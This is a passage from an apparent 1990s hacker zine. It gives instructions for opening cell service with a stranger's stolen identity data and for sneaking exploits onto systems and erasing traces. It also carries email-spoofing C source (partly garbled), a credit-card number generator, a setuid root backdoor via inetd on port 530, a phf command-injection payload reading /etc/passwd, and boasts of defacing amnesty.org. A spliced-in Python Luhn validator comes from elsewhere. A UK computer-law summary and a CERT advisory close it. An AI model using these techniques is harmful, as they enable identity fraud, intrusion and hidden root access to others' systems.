The best way, and the one I prefer to cloning, is to get someone else's
information and set up service. The best place to get the information you'll
need is from a place that does credit checks, like a bank or car dealership.
Make sure they have a good rating, like A, B or C, then you won't be asked
for a deposit. You'll need a name, address, social security number, driver's
license number and work number. You will also need a cell phone that is not
stolen.
They will not activate a stolen phone, when I tried they put me on hold and
called the person whose phone I had and then told me the person wanted me to
mail the phone back to them. Also find and write down the electronic serial
number, you'll need that too.

You then need to call a local cell service provider (ie. GTE MobilNet,
Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell
you about the different service plans and pick one. They will then ask for
your "information" and ESN. Then they will ask to call you back with your new
cell number, tell them that you're out and ask for a number to call them back
at, they will have no problem with this. Then call them back and they will
tell you how to program your new number into your phone, they might also tell
you how to program in a new system ID and paging channel etc, this is no big
deal. Also ask when the billing cycle ends and when the bill is sent out, you
will want to stop using this number when the person you're billing it to gets
their bill. Be sure to get call features like 3-way and call forwarding,
they're always useful to have.

I prefer this to cloning because it's less worry and hassle and it lasts up
to a month.

───────────────────────────────────────────────────────────────────────────────
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
───────────────────────────────────────────────────────────────────────────────
1. Getting Your Exploits Onto Systems : so1o
───────────────────────────────────────────────────────────────────────────────

You want to get files or exploits onto another system, you can do this the
following few ways...

1) Mail The User The File.
--------------------------

This method is simple, easy to do, pretty undetectable, but sometimes may be a
touch too slow, depending on the location / speed of the system...just mail
login@host.com the file or whatever, then wait at the other side for them to
get it.

2) FTP to the system.
----------------------

Using an FTP client, you can FTP to the remote server from your system, then
upload the files to the server, but you will most probably get logged, and so
if your exploits fail, this may not be such a good idea...

3) Use cat to input the file from the terminal.
-----------------------------------------------

This is easy to do, pretty quick and effective, follow these steps...

FearFactory:~:$ cat > heh.c << STOP
#include <stdio.h>

main()
{
  printf("Quit Laughin' At Yerself Yew Gimp :P\n");
}
STOP
FearFactory:~:$ cat heh.c
#include <stdio.h>

main()
{
  printf("Quit Laughin' At Yerself Yew Gimp :P\n");
}
FearFactory:~:$ cc -o heh heh.c
FearFactory:~:$ heh
Quit Laughin' At Yerself Yew Gimp :P
FearFactory:~:$

I used "cat > filename.c << STOP" to input the file from the terminal. I could
have cut a file from another editor, then just pasted it to the terminal; then
when I type "STOP" and hit enter, cat stops taking input from the terminal and
EOF's the file...Then I cat it again, to prove that the STOP does not stay as
part of the file, then I proceed to compile the source using cc and then I run
the program, easy =)

Always remember to remove traces of exploits from the system if you fail, as
this is messy and could lead to the admin becoming suspicious, just keep your
technique clean, and you will learn some good skills...
Recommended Reading :
---------------------

LINUX IN A NUTSHELL - A Desktop Quick Reference
By Jessica Perry Hekman
Copyright 1997 O'Reilly & Associates
ISBN 1-56592-167-4
UK : £14.99   US : $19.95   CAN : $28.95

I really like this book, it's very easy to use, pretty compact, and 424 pages
long; the information in it will boost your skills by a long way if you are a
newbie, and there are a lot of more advanced features, such as debugfs and
many other programs and their syntax. Basically it's a dictionary of Linux
commands, along with a short explanation, the syntax for the command and many
examples. I have the first printing, which is January 1997, so this book is
not old at all, and pretty up-to-date...

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Fakemailing Techniques : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Fakemailing is old and very very easy to do. To use this simple fakemailing
program just make a file, such as letter.txt, with the stuff you want to send
in it, like "Hey Bill! how's it going?" or whatever. Next compile sendfake.c
using

  gcc -o sendfake sendfake.c

and ignore any warning messages.
Run the program using "sendfake" and follow the steps, simple as that =)

/**********************************************************/
/*                       SENDFAKE.C                       */
/*                                                        */
/*                                                        */
/*        Author: asm@quantum.syspac.com                  */
/*                                                        */
/*        To compile: gcc -o sendfake sendfake.c          */
/*        Usage     : sendfake                            */
/*                                                        */
/**********************************************************/

/* The header names were lost when the zine was transcribed (everything
   between angle brackets was stripped); these are the headers the calls
   below need. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define MAXLEN 256

int s;

/* Open a TCP connection to port 25 (SMTP) on hostname; returns the socket
   or -1. */
int call_socket(char *hostname)
{
  struct sockaddr_in sa;
  struct hostent *hp;
  int a, s;

  if ((hp = gethostbyname(hostname)) == NULL)
    return(-1);
  bzero(&sa, sizeof(sa));
  bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length);
  sa.sin_family = hp->h_addrtype;
  sa.sin_port = htons((u_short)25);
  if ((s = socket(hp->h_addrtype, SOCK_STREAM, 0)) < 0)
    return(-1);
  if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
    close(s);
    return(-1);
  }
  return(s);
}

/* Read one line of the server's reply into buf, a byte at a time. */
int readln(char *buf)
{
  int to = 0;
  char c;

  do {
    if (read(s, &c, 1) < 1)
      return(0);
    if ((c >= ' ') || (c <= 126))
      if(to",from);
      /* The zine's copy is cut here: the rest of readln(), the writeln()
         and input() helpers and the start of main() up to the MAIL FROM
         line are missing (another casualty of the stripped angle
         brackets). */
  writeln(str);
  readln(buf);
  do {
    input("Send fake mail TO", to);
    sprintf(str, "RCPT TO: <%s>", to);
    writeln(str);
    readln(buf);
    *(buf + 3) = 0;                 /* keep only the 3-digit SMTP reply code */
    if (atoi(buf) == 250)
      break;
    else
      printf("%s", buf + 4);
  } while (1);
  input("Name of lamer getting the fake mail", name);
  input("Subject of fake mail", subject);
  writeln("DATA");
  sprintf(str, "To: %s <%s>", name, to);
  writeln(str);
  if (strlen(subject)) {
    sprintf(str, "Subject: %s", subject);
    writeln(str);
  }
  do {
    input("File to read and include in fake mail", str);
    if (!strlen(str)) {
      close(s);
      exit(1);
    }
    if ((fp = fopen(str, "rt")) == NULL)
      printf("Could not find file %s\n", str);
    else
      break;
  } while (1);
  while (fgets(str, MAXLEN, fp))   /* message body straight from the file */
    write(s, str, strlen(str));
  writeln("\n.\n");                /* lone '.' ends the DATA section */
  readln(buf);
  writeln("QUIT\n");
  printf("Sent!!!\n");
  close(s);
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Pascal Credit Card Generator Source : Lobster Guacamole
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

PROGRAM ccnum;

{ Written by Lobster Guacamole.                                              }
{                                                                            }
{ I wrote this program because I enjoy fucking over every goddam bureacratic }
{ and/or facist aspect of our society. This program simply spits out ten     }
{ random credit card numbers based on the bank prefix used. See lines 58     }
{ through 61 for information on the bank prefix used. There is also a lame   }
{ password feature for minor security. See lines 42 through 50 for           }
{ information on the password feature.                                       }
{                                                                            }
{ Remember, however, the numbers that are spit out may not work because      }
{ the credit card company may not have assigned that number to a customer    }
{ yet. Have fun!                                                             }
{                                                                            }
{ You can use a simple program like pas2c to translate this code into c      }
{ - Tetsu Khan                                                               }

USES Crt;

VAR
  ccnum_count : Integer;

PROCEDURE program_init;
BEGIN
  Randomize;
  CheckBreak := False;
END;

PROCEDURE show_title;
BEGIN
  ClrScr;
  Writeln;
  Writeln( 'CCNUM - Credit Card Number Generator.' );
  Writeln( 'Written by Lobster Guacamole.' );
  Writeln;
END;

PROCEDURE get_pwd;
VAR
  program_pwd : String;
BEGIN
  Writeln;
  Write( 'Enter password>' );
  Readln( program_pwd );
  IF program_pwd = 'a' THEN           { The current password is a lower case }
  BEGIN                               { letter 'a'. Recompile the program if }
    Writeln;                          { you change the password, of course.  }
    Writeln( 'Correct' );             { Change password on line 47 as well.  }
    Writeln;
  END;
  IF program_pwd <> 'a' THEN          { If you changed the password on line 40, }
  BEGIN                               { change it here, too.                    }
    Writeln;
    Writeln( 'Incorrect' );
    Halt;
  END;
END;

PROCEDURE make_ccnum;
VAR
  ccnum_digits    : ARRAY[ 1..16 ] OF Integer;
  doub_odd_digits : ARRAY[ 1..8 ] OF Integer;
  digit_count     : Integer;
  yn_choice       : Char;
  added_digits    : Integer;
BEGIN
  ccnum_digits[1] := 5;    { This part may have to be changed depending }
  ccnum_digits[2] := 4;    { on the bank prefix used. The bank prefix   }
  ccnum_digits[3] := 2;    { here is '5424', the prefix for Citibank.   }
  ccnum_digits[4] := 4;    { Recompile the program if you change it.    }
  REPEAT
    FOR digit_count := 5 TO 16 DO
    BEGIN
      ccnum_digits[ digit_count ] := Random(10);
    END;
    doub_odd_digits[1] := 2 * ccnum_digits[1];
    IF doub_odd_digits[1] > 9 THEN doub_odd_digits[1] := doub_odd_digits[1] - 9;
    doub_odd_digits[2] := 2 * ccnum_digits[3];
    IF doub_odd_digits[2] > 9 THEN doub_odd_digits[2] := doub_odd_digits[2] - 9;
    doub_odd_digits[3] := 2 * ccnum_digits[5];
    IF doub_odd_digits[3] > 9 THEN doub_odd_digits[3] := doub_odd_digits[3] - 9;
    doub_odd_digits[4] := 2 * ccnum_digits[7];
    IF doub_odd_digits[4] > 9 THEN doub_odd_digits[4] := doub_odd_digits[4] - 9;
    doub_odd_digits[5] := 2 * ccnum_digits[9];
    IF doub_odd_digits[5] > 9 THEN doub_odd_digits[5] := doub_odd_digits[5] - 9;
    doub_odd_digits[6] := 2 * ccnum_digits[11];
    IF doub_odd_digits[6] > 9 THEN doub_odd_digits[6] := doub_odd_digits[6] - 9;
    doub_odd_digits[7] := 2 * ccnum_digits[13];
    IF doub_odd_digits[7] > 9 THEN doub_odd_digits[7] := doub_odd_digits[7] - 9;
    doub_odd_digits[8] := 2 * ccnum_digits[15];
    IF doub_odd_digits[8] > 9 THEN doub_odd_digits[8] := doub_odd_digits[8] - 9;
    added_digits := doub_odd_digits[1] + doub_odd_digits[2] +
                    doub_odd_digits[3] + doub_odd_digits[4] +
                    doub_odd_digits[5] + doub_odd_digits[6] +
                    doub_odd_digits[7] + doub_odd_digits[8] +
                    ccnum_digits[2]  + ccnum_digits[4]  +
                    ccnum_digits[6]  + ccnum_digits[8]  +
                    ccnum_digits[10] + ccnum_digits[12] +
                    ccnum_digits[14] + ccnum_digits[16];
  UNTIL added_digits MOD 10 = 0;
  Writeln( ' ', ccnum_digits[1],  ccnum_digits[2],  ccnum_digits[3],  ccnum_digits[4],
           ' ', ccnum_digits[5],  ccnum_digits[6],  ccnum_digits[7],  ccnum_digits[8],
           ' ', ccnum_digits[9],  ccnum_digits[10], ccnum_digits[11], ccnum_digits[12],
           ' ', ccnum_digits[13], ccnum_digits[14], ccnum_digits[15], ccnum_digits[16] );
END;

BEGIN
  program_init;
  show_title;
  get_pwd;
  FOR ccnum_count := 1 TO 10 DO
    make_ccnum;
END.
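The REPEAT loop above is the Luhn (mod 10) check written out by hand for 16 digits: double digits 1, 3, ... 15 counting from the left, fold anything over 9 back to one digit, add the rest, keep the number only if the total is a multiple of 10. As an added example, not part of the zine or Lobster Guacamole's program, here is the same rule in Python as a validator, generalised to any length (from the rightmost digit, every second digit is doubled); this is the check a payment form runs on input before a number goes anywhere. The sample numbers are constructed; passing the checksum only means the digits are self-consistent, not that the number was ever issued, which is the point the program's header comment makes.

```python
"""Luhn (mod 10) check-digit validation.

Added example, not code from the original zine.  Generalises the
16-digit case the Pascal program hard-codes: counting from the
rightmost digit (the check digit, position 0), every digit at an odd
position is doubled and folded, and the total must be 0 mod 10.
"""


def _luhn_sum(digits: str) -> int:
    """Luhn weighted digit sum; the last character is the check digit."""
    total = 0
    # Walk from the right: index 0 is the check digit and is never doubled.
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - ord("0")
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9  # same fold as "IF ... > 9 THEN ... - 9" in the Pascal
        total += d
    return total


def normalise(number: str) -> str:
    """Drop the group separators the Pascal program prints; reject anything else."""
    cleaned = number.replace(" ", "").replace("-", "")
    if not cleaned.isdigit():
        raise ValueError("card number must contain digits only")
    return cleaned


def luhn_valid(number: str) -> bool:
    """True if the full number (check digit included) satisfies the mod 10 rule."""
    return _luhn_sum(normalise(number)) % 10 == 0


def luhn_check_digit(payload: str) -> int:
    """Check digit that makes payload + digit Luhn-valid.

    A placeholder 0 is appended so the payload digits land in the same
    doubled / not-doubled positions they will have in the final number.
    """
    s = _luhn_sum(normalise(payload) + "0")
    return (10 - s % 10) % 10


def detects_all_single_digit_errors(number: str) -> bool:
    """Every single-digit substitution is rejected.

    Holds for any valid number: an undoubled digit change shifts the sum
    by a non-zero amount below 10, and the doubled-and-folded map is a
    bijection on 0..9, so no single substitution keeps the total at 0 mod 10.
    """
    digits = normalise(number)
    if not luhn_valid(digits):
        return False
    for i, ch in enumerate(digits):
        for repl in "0123456789":
            if repl == ch:
                continue
            altered = digits[:i] + repl + digits[i + 1:]
            if luhn_valid(altered):
                return False
    return True


if __name__ == "__main__":
    # Constructed samples: the first uses the '5424' prefix the Pascal
    # program hard-codes, the second is a standard 11-digit Luhn test value.
    for n in ("5424 1802 7979 1732", "7992 7398 713", "5424 1802 7979 1733"):
        print(n, "passes" if luhn_valid(n) else "FAILS", "the mod 10 check")
```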
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. in.courierd : backdoor on port 530 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

As root do the following (without the %'s ;]) to setup the backdoor.
--------------------------------------------------------------------

[This Method Has Been Tested On A Linux 2.0.30]

% cp /bin/bash /usr/sbin/in.courierd
% chmod 4755 /usr/sbin/in.courierd           [optional, depends on system]
% echo "courier stream tcp nowait root /usr/sbin/in.courierd" >> /etc/inetd.conf
% /sbin/pidof inetd.conf                     [to find the pid of inetd.conf]
% kill -HUP                                  [replace the with the real pid]
% telnet localhost 530                       [test backdoor]

All commands to the backdoor must end with ;, for example....

exit;
ps -a;
whoami;
cd /;

You are root when you use the backdoor, and you are not seen or logged. The
last time I used this, it stayed up for 2 weeks =)

The above commands I have tested in Linux; I have heard that you have to
reboot a Sun for the new settings to take effect (shutdown -r now). But hey!
it's only a prototype at the moment until I make it cool and a lot better =)

Have fun.

so1o

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. UK Laws On Computer Misuse : Darkfool
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This part is actually useful info, not like Darkfool's lesser works...
Partially edited by me, the original can now be found at
www.sinnerz.com/bible.htm - T_K

Hey, this is an interesting little read. Please note it still can be quite
interesting even if you don't live in the UK - Darkfool.

The 1990 Computer Misuse Act - UK
---------------------------------

In plain English.
-----------------

"An Act to make provision for securing computer material against unauthorised
access or modification; and for connected purposes"

{ This is the long title (header) of the Act and confirms what the act does
  and applies to.
}

SECTION 1 Unauthorised access to computer material
--------------------------------------------------

TEXT: A person is guilty of an offence if he causes a computer to perform any
function with intent to secure access to any program or data held in any
computer.

{ This means that if you can get access to files which you shouldn't be
  allowed to retrieve or read then you are committing an offence; this only
  applies if the person in question has intent ( meaning they are doing it on
  purpose, often referred to as hacking ) to carry this out. }

A person is guilty of an Offence if the access he intends to secure is
unauthorised; and he knows at the time when he causes the computer to perform
the function that that is the case.

{ This means that if the person doesn't have authorisation to secure access
  to files then he is committing an offence. The person is not guilty if
  he/she doesn't know what they are trying to perform. This applies to
  everything i.e. any program, a program or data of any particular kind and a
  program or data held }

A person guilty of an offence under this section shall be liable on summary
conviction to imprisonment for a term not exceeding six months or to a fine
not exceeding level 5 on the standard scale or to both.

{ Meaning, you could go to prison for 6 months for committing an offence
  mentioned above ! You could also be subject to a fine @ level 5, which is
  always changing. You have to be convicted of the crime first though ;) }

SECTION 2 Unauthorised access with intent to commit or facilitate
-----------------------------------------------------------------
commission of further offences
------------------------------

A person is guilty of an offence under this section if he commits an offence
under section 1 above.
To commit an offence to which this section applies or to facilitate the
commission of such an offence ( whether by himself or by any other person)
and the offence he intends to commit or facilitate is referred to below in
this section as the further offence.

{ This meaning that what is mentioned in section 2 applies to the person
  gaining unauthorised access to a computer system and to anyone who
  facilitates such a person }

This section applies to offences for which a person of twenty-one years of
age or over ( not previously convicted ) may be sentenced to imprisonment for
a term of five years.

{ This means that if you re-offend or facilitate to re-offend and have been
  convicted you are liable to 5 years imprisonment or/and a large fine }

SECTION 3 Unauthorised modification of computer material
--------------------------------------------------------

A person is guilty of an offence if he/she does any act that causes an
unauthorised modification of the contents of any computer; and at the time
when he does the act he has the requisite intent and the requisite knowledge.

{ This means that if a person modifies computer material which he/she is not
  authorised to do he/she is guilty of committing an offence, however, the
  person must have the intent to carry out this crime else the person is not
  liable }

{ This next bit is the interesting bit }

For the purposes of the above section the requisite knowledge is an intent to
cause a modification of the contents of any computer and by so doing to
impair the operation of any computer; to prevent or hinder access to any
program or data held in any computer; to impair the operation of any such
program or the reliability of any such data. The intent need not be directed
at any particular computer; any particular program or data or a program or
data of any particular kind; or any particular modification.
{ This basically means, if you have the intent and knowledge of breaking into
  computers, without having to actually do it you can be liable to an
  offence. }

For the purposes of the Criminal Damage Act 1971 a modification of the
contents of a computer shall not be regarded as damaging any computer or
computer storage medium unless its effect on that computer storage medium,
impairs its physical condition.

{ Meaning that you cannot be prosecuted for criminal damage whilst hacking
  into a machine unless you cause physical damage i.e. on site hacking, then
  taking a sledge hammer to the computer can be classed as criminal damage
  but changing the password for root login is not criminal damage, unless you
  send the computer into high speed self destruct mode and ruin one of the
  heads on the 50 gig juke box ? }

{ A lot of the next part of the document is about jurisdiction and some
  technical mumbo jumbo }

SECTION 14 Search warrants for offences under section 1
-------------------------------------------------------

Where a circuit judge is satisfied by information on oath given by a
constable that there are reasonable grounds for believing that an offence
under section 1 above has been or is about to be committed in any premises;
and that evidence that such an offence has been or is about to be committed
is in those premises he/she may issue a warrant authorising a constable to
enter and search the premises, using such reasonable force as is necessary.

{ This basically means that if they believe that you have the intent or have
  broken into a system you're not supposed to ( section 1 ) they can come
  around your house and knock your door in, or, open it for them nicely.
}

SECTION 15 Extradition where Schedule 1 to the Extradition Act 1989 applies
---------------------------------------------------------------------------

The offences to which an order in council under section 2 of the extradition
act 1870 can apply shall include offences under sections 2 and 3 and any
conspiracy to commit such an offence and any attempt to commit an offence
under section 3.

{ This meaning, that if you have a conspiracy to break into a system you can
  be extradited }

In the UK it can be illegal to possess anything which may show an intent to
hack, such as hacking documents. So, if you're out there and in the UK and
didn't know that what you were doing is most probably illegal then keep your
head down !

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. so1o Gets Busted By CERT : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken
pussy! and a cl000less one at that!@# Spreadin' shit about stuff you dont
know :

[20:57] dude!! wassup?
[20:59] so1o got busted by CERT! lol
[21:00] yup
[21:00] they have logs of him on over 80 computers
[21:01] thats all i know is like what i just got forwarded to me
[21:03] they got logs from when he used phfscan.c
[21:03] and other shit any more info on so1o shit ?
[21:06] l
[21:06] Dear Sir.
[21:06] We have now traced down the responsible account behind this attempt and
[21:06] have taken action against it.
[21:06] If you would like to know who is behond this you should either file a
[21:06] report to the propper authoroties or fax pege Gustagsson at +++ 46 8
[21:06] 7132657 and ask him to trace this down in the phone network.
[21:06] If you got any more question feel free to get back to me.. or if you
[21:06] think that this is to be considered as closed.
[21:06] check this now
[21:06]  __  ____    Telia Internet
[21:06] / /_/ /     Incident Response Team
[21:06] / / \ /     IRT@TELIA.NET
[21:06]             FAX ++46 - 8 456 8935
[21:06] On Fri, 2 May 1997, m0dify wrote:
[21:06] > That is the log from our www.usda.gov web server.... CERT also said that
[21:06] > this log is on 80 computers since 4/1/97 . There was also a log on
[21:06] > the 17th of April.
[21:07] > > Dear Sir.
[21:08] > > This messages dropped down on my desk today.
[21:08] > > I need a time to know who was on that dial up and so whe could hunt
[21:08] > > him/her down in the phone network..
[21:08] heh... so1o fuct up it seems.. he's toast.
[21:10] im glad to man... amnesty was just so uncool when he did that

h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#

I've seen one of those logs that Modify had (now CERT have them too) and, I'm
sooooo disappointed to say...
-I- -D-I-D-N-'-T -P-H-F- -T-H-O-S-E- S-I-T-E-S-

Let us look at the facts...Those that Hostile and his little lameassfuck sIn
wannabe haqr posse didn't even see :

-------------------------------------------------------------------------------
THE FACTS :
-------------------------------------------------------------------------------

CERT logs show that the phf queries to approximately 80 sites on the same day
that the www.amnesty.org page was changed show that this technique was
used..which is fundamentally incorrect. Here is the phf query string found in
the logs; the fact that this was on the same day as amnesty is the ONLY
factor linking me to these events :

GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd

(I think there's also a "3D" somewhere in there too..)

And here is the phf query code set down by every text I have ever read AND in
phfscan.c which I would use if I ever wanted to scan such sites for the phf
hole :

GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

I think we can all see a slight difference, which basically says "IT'S NOT MY
FUCKING STYLE! ONLY A LUNA-FUCKING-TICK would even think about using that
technique. Seeing it probably wouldn't work anyway."

The next point is the IP from where the queries originate, it is *.telia.com
which I have been told is a SWEDISH ISP now, do I live in Sweden? NO!! Do I
have any shells at dynamic IP's IN SWEDEN? NO!! There is no plausible way I
could have run such a scan. Unless I dial long distance, which isn't gonna
happen.

One last point, I knew that we "0wned" amnesty.org from about 2 weeks before
we actually decided to change the index.html, because when my friends broke
in the first time, they had set up a .rhosts file and a suid root shell in
something like /tmp/....
But when they left the system and tried to regain access, they found that the
admin had removed the account or changed the login and pass, so we decided to
leave the site for about a week and a half, until we started to try and
formulate a way to get back in; in this period we did NO phf scanning
whatsoever. And on the weekend when we did get back in, using an ingenious
method that I was never told about, by a new hacker to our team, modeX, we
decided to at least do something to prove we had regained access, so I
designed a new index.html, which the team uploaded.

That was all that happened, and therefore the phf scans can IN NO WAY be
related to the amnesty.org attack as we owned that system A LONG TIME before,
and it was only a matter of regaining access, one last point being that we
didn't walk through the amnesty "front door" as it were, as I was told we
stumbled over a trusted host, shell.oil.ca or something like that.

Anyway, that's just a few points I would like to raise in proving that sIn
are again VERY CL000LESS fucks who know absolutely NOTHING about hacking or
"the scene" in any way shape or form...And as for the Incident Response Team,
they are most probably looking for some lamefuck Swedish haqr.

Any-Fucking-Way, what the fuck they gonna do when they find this haqr?!@
arrest him for phf'ing 80 sites? h0h0h0, I wouldn't call that much of a bust
:) "Listen sonny! you're gonna get 10 years for connecting to port 80 and
typing "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd" because that's
not against ANY law and CERT owns us all.

so1o.

There are a lot of missing pieces, and a lot of the data I base my argument
on originated from m0dify (see the letter to IRT@TELIA.NET earlier) so I
think I have more of an idea than Hostile the cl00less lame gimpfuck wannabe
haqr.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. CERT Advisory CA-97.13 : xlock vulnerability : Taken From Bugtraq
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Topic: Vulnerability in xlock
-------------------------------------------------------------------------------

The CERT Coordination Center has received reports that a buffer overflow
condition exists in some implementations of xlock. This vulnerability makes it
possible for local users (users with access to an account on the system) to
execute arbitrary programs as a privileged user.

Exploitation information involving this vulnerability has been made publicly
available.

If your system is vulnerable, the CERT/CC team recommends installing a patch
from your vendor. If you are not certain whether your system is vulnerable or
if you know that your system is vulnerable and you cannot add a patch
immediately, we urge you to apply the workaround described in Section III.B.

We will update this advisory as we receive additional information. Please
check our advisory files regularly for updates that relate to your site.

-------------------------------------------------------------------------------

I.   Description

     xlock is a program that allows a user to "lock" an X terminal. A buffer
     overflow condition exists in some implementations of xlock. It is
     possible to attain unauthorized access to a system by engineering a
     particular environment and calling a vulnerable version of xlock that has
     setuid or setgid bits set.

     Information about vulnerable versions must be obtained from vendors. Some
     vendor information can be found in Appendix A of this advisory.

     Exploitation information involving this vulnerability has been made
     publicly available.

     Note that this problem is different from that discussed in CERT Advisory
     CA-97.11.libXt.

II.  Impact

     Local users are able to execute arbitrary programs as a privileged user
     without authorization.

III. Solution

     Install a patch from your vendor as described in Solution A.
     If you are not certain whether your system is vulnerable or if you know
     that your system is vulnerable and you cannot install a patch
     immediately, we recommend Solution B.

     A. Obtain and install a patch for this problem.

        Below is a list of vendors who have provided information about xlock.
        Details are in Appendix A of this advisory; we will update the
        appendix as we receive more information. If your vendor's name is not
        on this list, the CERT/CC did not hear from that vendor. Please
        contact your vendor directly.

           Berkeley Software Design, Inc. (BSDI)
           Cray Research - A Silicon Graphics Company
           Data General Corporation
           Digital Equipment Corporation
           FreeBSD, Inc.
           Hewlett-Packard Company
           IBM Corporation
           LINUX
           NEC Corporation
           The Open Group
             [This group distributes the publicly available software that
              was formerly distributed by X Consortium]
           Solbourne
           Sun Microsystems, Inc.

     B. We recommend the following workaround if you are not certain whether
        your system is vulnerable or if you know that your system is
        vulnerable and you cannot install a patch immediately.

        1. Find and disable any copies of xlock that exist on your system and
           that have the setuid or setgid bits set.

        2. Install a version of xlock known to be immune to this
           vulnerability. One such supported tool is xlockmore. The latest
           version of this tool is 4.02, and you should ensure that this is
           the version you are using. This utility can be obtained from the
           following site:

              ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz

              MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e

           You can also obtain this version from mirror sites. A list of
           these sites will be displayed if you are not able to access the
           above archive due to load.

